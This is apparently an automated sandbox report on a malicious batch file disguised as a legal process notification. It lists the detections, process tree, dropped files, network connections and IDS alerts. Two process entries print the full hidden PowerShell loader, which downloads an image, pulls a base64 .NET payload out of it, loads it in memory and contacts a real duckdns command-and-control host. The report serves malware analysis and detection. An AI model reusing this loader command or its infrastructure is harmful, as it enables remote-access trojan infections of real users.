| File name: | 280425-NotificacinProcesoNro.11001020400020240180500.bat |
| Full analysis: | https://app.any.run/tasks/659ceebc-ce08-4df8-b735-b1419a70619c |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 16, 2025, 15:08:34 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | Unicode text, UTF-8 text, with very long lines (2718), with CRLF line terminators |
| MD5: | 7006FFE213C0AEE9011173BD136DFA2A |
| SHA1: | 727A658882E6EA0C16E376947F6EB311DC14E719 |
| SHA256: | 9AD95D80234ADB357EBC6DF131711C419D561FAD26707C4E162BD1FF92B3D00E |
| SSDEEP: | 6144:eozMk8+vIyIvqtjsj4AgqeW2oCy8u8e8KMGyO8:v |
MALICIOUS
STEGOCAMPAIGN has been detected
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Bypass execution policy to execute commands
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 7748)
- cmd.exe (PID: 8124)
Run PowerShell with an invisible window
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Create files in the Startup directory
- cmd.exe (PID: 7748)
STEGOCAMPAIGN mutex has been found
- powershell.exe (PID: 8184)
- powershell.exe (PID: 7816)
XWORM has been detected (SURICATA)
- powershell.exe (PID: 7816)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 8184)
- powershell.exe (PID: 7816)
SUSPICIOUS
Probably download files using WebClient
- cmd.exe (PID: 7748)
- cmd.exe (PID: 8124)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 7748)
- cmd.exe (PID: 8124)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Contacting a server suspected of hosting an CnC
- powershell.exe (PID: 7816)
Connects to unusual port
- powershell.exe (PID: 7816)
INFO
Auto-launch of the file from Startup directory
- cmd.exe (PID: 7748)
Manual execution by a user
- cmd.exe (PID: 8124)
Disables trace logs
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Checks proxy server information
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
- slui.exe (PID: 1184)
Reads the software policy settings
- slui.exe (PID: 1184)
Gets data length (POWERSHELL)
- powershell.exe (PID: 7816)
- powershell.exe (PID: 8184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
135
Monitored processes
8
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1184 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7748 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\280425-NotificacinProcesoNro.11001020400020240180500.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7756 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7816 | powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9nZXN0aW9ueWNvYnJhbnphcy5jb20vMS9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('env260325.duckdns.org', '8666');" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8124 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anagogetical.bat"" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8132 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 8184 | powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9nZXN0aW9ueWNvYnJhbnphcy5jb20vMS9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('env260325.duckdns.org', '8666');" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
13 530
Read events
13 530
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
1
Text files
5
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 8184 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:91AC56FBF082C927A742B6BAC7B8C032 | SHA256:A8E0969DB6F9C81EC18227CE1A68B26E98070EB3E47870864B31B8B0C5BF3F66 | |||
| 8184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gkvb2vx2.k24.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c20bpuof.5e2.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7748 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anagogetical.bat | text | |
MD5:7006FFE213C0AEE9011173BD136DFA2A | SHA256:9AD95D80234ADB357EBC6DF131711C419D561FAD26707C4E162BD1FF92B3D00E | |||
| 7816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ijhty4b5.tuz.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 8184 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qo1emskc.3ho.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
23
DNS requests
9
Threats
12
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2112 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
7816 | powershell.exe | 52.45.232.96:443 | gestionycobranzas.com | AMAZON-AES | US | unknown |
2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
8184 | powershell.exe | 52.45.232.96:443 | gestionycobranzas.com | AMAZON-AES | US | unknown |
7816 | powershell.exe | 94.154.35.80:8666 | env260325.duckdns.org | WINDSTREAM | US | malicious |
7536 | slui.exe | 20.83.72.98:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
gestionycobranzas.com |
| unknown |
env260325.duckdns.org |
| unknown |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image |
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558) |
— | — | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 |
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image |
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558) |
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
7816 | powershell.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 14 |
— | — | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 |
7816 | powershell.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Packet |